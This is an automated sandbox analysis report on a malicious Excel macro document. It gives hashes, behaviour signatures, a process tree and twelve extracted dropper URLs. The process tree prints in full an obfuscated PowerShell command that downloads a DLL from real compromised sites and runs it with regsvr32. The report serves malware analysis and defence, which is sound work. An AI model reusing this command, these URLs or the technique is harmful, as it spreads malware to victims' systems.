Analysis

  • max time kernel
    135s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/11/2024, 19:01

General

  • Target

    258165aeb0b5a51007f905db642a43310a374d9d973603f6576455d25d13372d.xls

  • Size

    88KB

  • MD5

    7d7c66d9e861569a0a79051dd5ea3e82

  • SHA1

    11a28b173b00611c0e603ea3af2655fe1fd7fafb

  • SHA256

    258165aeb0b5a51007f905db642a43310a374d9d973603f6576455d25d13372d

  • SHA512

    bfec0d6826174849625eaa28b3eb698f4d5ad94edd42e2fe47d3876d80ded09f2041f304506aaa555ffc1069374e10fac080d24156829c6c321817700eabf8d6

  • SSDEEP

    1536:1yehv7q2Pjx45uoDGTj+5xtekEvi8/dgG8EsAeE9jbDXQMcAkWvgrPE4nWHPNc2C:1yehv7q2Pjx45uoDGTj+5xtekEvi8/dw

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://boardingschoolsoftware.com/backup/VC7WK/

exe.dropper

http://towardsun.net/admin/O29Fja/

exe.dropper

http://47.244.189.73/well-known/cwxgmEZsYIT/

exe.dropper

http://centrobilinguelospinos.com/wp-admin/AivCY/

exe.dropper

http://qqziyuanwang.com/wp-includes/KtXrm5GwJ/

exe.dropper

https://www.swaong.com/b/SVSAPzeDU657xJdmJv/

exe.dropper

https://trasix.com/wp-admin/FzpdyUrlGt/

exe.dropper

https://marineboyrecords.com/font-awesome/t37LOj/

exe.dropper

https://edgetactical.ritabilisim.com/admin/NbjDzEeNJ/

exe.dropper

http://cairm.xyz/backup_1/mQPAhJhpV/

exe.dropper

http://vrstar-park.com/wp-includes/0bAm9feNorwTmVrj/

exe.dropper

https://panaderialaimperial.com/wp-includes/Oi0guE0CQbyBJVg/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\258165aeb0b5a51007f905db642a43310a374d9d973603f6576455d25d13372d.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3348
    • C:\Windows\SYSTEM32\wscript.exe
      wscript c:\programdata\bbiwjdf.vbs
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4832
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$ghkid=('$MJXdfshDrfGZses4=\"http:ufieufieboardingschoolsoftware.comufiebackupufieVC7WKufiebouhttp:ufieufietowardsun.netufieadminufieO29Fjaufiebouhttp:ufieufie47.244.189.73ufiewell-knownufiecwxgmEZsYITufiebouhttp:ufieufiecentrobilinguelospinos.comufiewp-adminufieAivCYufiebouhttp:ufieufieqqziyuanwang.comufiewp-includesufieKtXrm5GwJufiebouhttps:ufieufiewww.swaong.comufiebufieSVSAPzeDU657xJdmJvufiebouhttps:ufieufietrasix.comufiewp-adminufieFzpdyUrlGtufiebouhttps:ufieufiemarineboyrecords.comufiefont-awesomeufiet37LOjufiebouhttps:ufieufieedgetactical.ritabilisim.comufieadminufieNbjDzEeNJufiebouhttp:ufieufiecairm.xyzufiebackup_1ufiemQPAhJhpVufiebouhttp:ufieufievrstar-park.comufiewp-includesufie0bAm9feNorwTmVrjufiebouhttps:ufieufiepanaderialaimperial.comufiewp-includesufieOi0guE0CQbyBJVgufie\" -sPLIt \"bou\"; foReACh($yIdsRhye34syufgxjcdf iN $MJXdfshDrfGZses4){$GweYH57sedswd=(\"ciuwd:iuwd\priuwdogiuwdramiuwddatiuwda\oiphilfj.diuwdliuwdl\").rePlACe(\"iuwd\",\"\");inVOke-weBrEqUesT -uRI $yIdsRhye34syufgxjcdf -oUtFIle $GweYH57sedswd;iF(teSt-pATh $GweYH57sedswd){if((gEt-itEm $GweYH57sedswd).leNGth -ge 47523){bReak;}}}').replace(\"ufie\",\"/\");iex $ghkid"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:888
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\regsvr32.exe /s c:\programdata\oiphilfj.dll
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3648
        • \??\c:\windows\syswow64\regsvr32.exe
          c:\windows\syswow64\regsvr32.exe /s c:\programdata\oiphilfj.dll
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4020

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rdh2jwiu.aqr.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

    Filesize

    3KB

    MD5

    3302bf31bff1f45f0a012392421c9bd1

    SHA1

    66b5710e1c7246e4f120407a6c54ceaa483ccdf8

    SHA256

    538ac1a9180b238e9882809c4c01f1f667e6c36305adf03ccbeb7934c5f5cd20

    SHA512

    0fc9624f7221447650653d873cdd74352d5638e1ef839cc486701962b47f4ec4b1d189a941926e0014509a1712f008d4b0db0e8c9af74a4a5cbfb6c6b25f9e01

  • \??\c:\programdata\bbiwjdf.vbs

    Filesize

    2KB

    MD5

    e5721226b02dafc4d914c1cd8adc938f

    SHA1

    75bc5bf508569a3d7c904ee61ac82136f8aca555

    SHA256

    555c1a3f0d1ff08f3a45c7558ded360c36b86541eae3ba84eb6b5aaba0c4c661

    SHA512

    9b6bad6a2130c03f5d27e917caf16e0f1f0a6a7e045c1ebf2ba4b0ca455b0a6e4f2e5b15618425f0b899d25d7251336cbcd0706198764dab7da136e926daa351

  • \??\c:\programdata\oiphilfj.dll

    Filesize

    1KB

    MD5

    b31e43a162e56d32cfff6af0122284f1

    SHA1

    c9a6a56cc9255666ebe9c46a123a4c0b2bb588a1

    SHA256

    1c4c11ccd1cd2b2fccff4db7bdb90908cdfb395573d791540815dcea5ccdc80b

    SHA512

    ea8280e5236fee0a2ad494095d493be210135cb98e899add64d43bf142cbc0287dda4e5b302745a867d40c0f7f846033929ac3c2fadc5ce3a061517091cbbbf2

  • memory/888-140-0x000001BBC94D0000-0x000001BBC9C76000-memory.dmp

    Filesize

    7.6MB

  • memory/888-123-0x000001BBB0660000-0x000001BBB0682000-memory.dmp

    Filesize

    136KB

  • memory/3348-8-0x00007FFBBED30000-0x00007FFBBEF25000-memory.dmp

    Filesize

    2.0MB

  • memory/3348-50-0x00007FFBBED30000-0x00007FFBBEF25000-memory.dmp

    Filesize

    2.0MB

  • memory/3348-6-0x00007FFBBED30000-0x00007FFBBEF25000-memory.dmp

    Filesize

    2.0MB

  • memory/3348-11-0x00007FFBBED30000-0x00007FFBBEF25000-memory.dmp

    Filesize

    2.0MB

  • memory/3348-13-0x00007FFBBED30000-0x00007FFBBEF25000-memory.dmp

    Filesize

    2.0MB

  • memory/3348-12-0x00007FFBBED30000-0x00007FFBBEF25000-memory.dmp

    Filesize

    2.0MB

  • memory/3348-14-0x00007FFB7C760000-0x00007FFB7C770000-memory.dmp

    Filesize

    64KB

  • memory/3348-10-0x00007FFBBED30000-0x00007FFBBEF25000-memory.dmp

    Filesize

    2.0MB

  • memory/3348-15-0x00007FFB7C760000-0x00007FFB7C770000-memory.dmp

    Filesize

    64KB

  • memory/3348-9-0x00007FFBBED30000-0x00007FFBBEF25000-memory.dmp

    Filesize

    2.0MB

  • memory/3348-17-0x00007FFBBED30000-0x00007FFBBEF25000-memory.dmp

    Filesize

    2.0MB

  • memory/3348-16-0x00007FFBBED30000-0x00007FFBBEF25000-memory.dmp

    Filesize

    2.0MB

  • memory/3348-24-0x00007FFBBED30000-0x00007FFBBEF25000-memory.dmp

    Filesize

    2.0MB

  • memory/3348-1-0x00007FFB7EDB0000-0x00007FFB7EDC0000-memory.dmp

    Filesize

    64KB

  • memory/3348-77-0x00007FFBBED30000-0x00007FFBBEF25000-memory.dmp

    Filesize

    2.0MB

  • memory/3348-7-0x00007FFBBED30000-0x00007FFBBEF25000-memory.dmp

    Filesize

    2.0MB

  • memory/3348-3-0x00007FFBBEDCD000-0x00007FFBBEDCE000-memory.dmp

    Filesize

    4KB

  • memory/3348-0-0x00007FFB7EDB0000-0x00007FFB7EDC0000-memory.dmp

    Filesize

    64KB

  • memory/3348-128-0x00007FFBBED30000-0x00007FFBBEF25000-memory.dmp

    Filesize

    2.0MB

  • memory/3348-129-0x00007FFBBED30000-0x00007FFBBEF25000-memory.dmp

    Filesize

    2.0MB

  • memory/3348-130-0x00007FFBBED30000-0x00007FFBBEF25000-memory.dmp

    Filesize

    2.0MB

  • memory/3348-134-0x00007FFBBED30000-0x00007FFBBEF25000-memory.dmp

    Filesize

    2.0MB

  • memory/3348-5-0x00007FFB7EDB0000-0x00007FFB7EDC0000-memory.dmp

    Filesize

    64KB

  • memory/3348-4-0x00007FFB7EDB0000-0x00007FFB7EDC0000-memory.dmp

    Filesize

    64KB

  • memory/3348-2-0x00007FFB7EDB0000-0x00007FFB7EDC0000-memory.dmp

    Filesize

    64KB